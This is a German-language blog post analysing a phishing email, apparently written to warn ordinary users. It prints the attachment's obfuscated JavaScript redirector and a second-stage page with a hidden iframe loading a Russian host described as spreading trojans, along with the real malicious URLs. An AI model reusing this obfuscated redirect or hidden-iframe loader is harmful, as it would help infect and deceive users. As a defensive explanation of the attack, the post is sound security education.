Ich bekam am Freitag eine Spam-E-Mail. Normalerweise werden diese E-Mails sofort gelöscht. Diesmal wollte ich mir aber mal genauer ansehen, was dahinter steckt. Meine Erkenntnisse möchte ich nachfolgend allen zur Verfügung stellen.

Eine Warnung vornweg: Bitte keine der nachfolgenden Dateien und Adressen aufrufen! Der eigene Rechner könnte dadurch mit schädlicher Software infiziert werden! Auch auf keinen Fall selbst solche Recherchen durchführen, solange nicht entsprechendes Hintergrundwissen vorhanden ist!

Nehmen wir mal an, ich habe eine E-Mail-Adresse bei meiner Firma: ich@abc.xyz. Nun bekomme ich augenscheinlich eine E-Mail vom Admin der Firma: admin@abc.xyz – ist sie aber nicht. Darin wird kurz beschrieben, dass es Unregelmäßigkeiten mit meinem E-Mail-Postfach gibt und ich mir den Anhang ansehen soll.

Im Anhang findet sich in diesem Fall eine Datei namens open.html. Diese kann ich mit einem Doppelklick öffnen. Dann öffnet sich praktischerweise mein Browser. Im Allgemeinen der Internet Explorer oder der Firefox. Wenn ich mich dann wundere, warum ich keine Informationen von meinem Administrator erhalte, ist es schon zu spät.

Was ich als unbedarfter Benutzer nicht weiß, ist, dass ich damit meinen Rechner mit einem Trojaner infiziere. Einem Programm, dass sich still und leise auf meinem PC installiert und im Hintergrund Informationen sammelt. Diese werden dann zum Beispiel per E-Mail oder ähnlichen Mechanismen weitergegeben.

Aber zurück zur Datei open.html. Diese hat folgenden Inhalt:

<script type='text/javascript'>
function dX(){};
var h=new Date();
dX.prototype = {f : function() {var u=function(){};
var uY=new Date();
var o="";
var k=document;
var oE=function(){};
var l='';
this.i=33457;
var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];
var w=function(){};
var p=false;
this.pP=false;
this.s='';
kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');
var iK="iK";
pK='';
this.d="d";
uM="";
}};
this.dK="";
var fG=new dX();
var dR="dR";fG.f();
hJ=false;
</script>

Das sieht jetzt alles ziemlich kryptisch aus. Wenn man sich dieses so genannte Javascript aber einmal genauer ansieht, stellt man fest, dass diese Datei auf folgende Adresse im Internet weiterleitet:

http://advancedwoodtech.com/xnu4ej/z.htm

Unter dieser Adresse findet man den Internet-Auftritt einer Möbelfirma aus den USA. Diese wissen von dieser Datei sehr wahrscheinlich nichts. Wie diese Datei namens z.htm dort hin kommt lässt sich nicht genau sagen. Möglicherweise gab es eine Schwachstelle in den Skripten dort oder ein zu einfaches Passwort. (Übrigens befindet sich diese Datei jetzt – zwei Tage später – nicht mehr auf dem Server.

Der Inhalt dieser Datei z.html sieht folgendermaßen aus:

<meta http-equiv="refresh" content="3;url=http://toldspeak.com/" />
<iframe src='http://copbun.ru:8080/index.php?pid=10' width='1'
height='1' style='visibility: hidden;'></iframe>

Wieder eine Weiterleitung. Diesmal zu einer Spam-Seite. Dort bekommt man Werbung angezeigt. Außerdem enthält die Datei einen so genannten iframe. In diesem kann man weitere Dateien einbinden. In diesem Fall eine Datei vom Server cophun.ru. Dieser ist für die Verbreitung von Trojanern bekannt.

So schnell kann es gehen.

Daher sollte man sich ganz genau überlegen, ob man Anhänge öffnet. Notfalls kann man ja nochmals Rücksprache mit dem vermeintlichen Absender halten.